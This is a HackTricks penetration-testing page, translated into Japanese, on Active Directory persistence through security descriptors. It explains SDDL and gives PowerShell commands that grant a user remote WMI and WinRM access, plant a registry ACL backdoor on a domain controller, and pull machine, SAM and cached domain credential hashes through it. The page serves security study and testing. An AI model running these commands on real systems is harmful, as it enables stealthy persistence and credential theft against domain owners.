hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md

セキュリティディスクリプタ

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！

• The PEASS Familyを見つけてください。独占的なNFTのコレクションです。

• 公式のPEASS＆HackTricksのグッズを手に入れましょう。

• 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。

• **ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。

セキュリティディスクリプタ

セキュリティディスクリプタ定義言語（SDDL）は、セキュリティディスクリプタを記述するために使用される形式を定義します。SDDLは、DACLとSACLにACE文字列を使用します：ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

セキュリティディスクリプタは、オブジェクトがオブジェクトに対して持つ許可を格納するために使用されます。オブジェクトのセキュリティディスクリプタにわずかな変更を加えることができれば、特権のあるグループのメンバーである必要なく、そのオブジェクトに対して非常に興味深い特権を得ることができます。

したがって、この永続化技術は、特定のオブジェクトに対して必要なすべての特権を獲得し、通常は管理者特権が必要なタスクを管理者でなくても実行できる能力に基づいています。

WMIへのアクセス

ユーザーにリモートでWMIを実行する権限を与えることができます。こちらを使用してください:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

WinRMへのアクセス

こちらを使用して、ユーザーにwinrm PSコンソールへのアクセスを許可します。

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

ハッシュへのリモートアクセス

レジストリにアクセスし、ハッシュをダンプして、DAMPを使用してレジストリのバックドアを作成します。これにより、いつでもコンピュータのハッシュ**、SAM、およびコンピュータにキャッシュされたADの資格情報を取得できます。したがって、ドメインコントローラコンピュータに対して通常のユーザにこの権限を与えるのは非常に便利です。

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Silver Ticketsをチェックして、ドメインコントローラーのコンピューターアカウントのハッシュを使用する方法を学びましょう。

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ会社で働いていますか？ HackTricksで会社を宣伝したいですか？または、最新バージョンのPEASSを入手したいですか？または、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！

• The PEASS Familyを発見しましょう。独占的なNFTのコレクションです。

• 公式のPEASS＆HackTricksのグッズを手に入れましょう。

• 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦@carlospolopmをフォローしてください。

• **ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。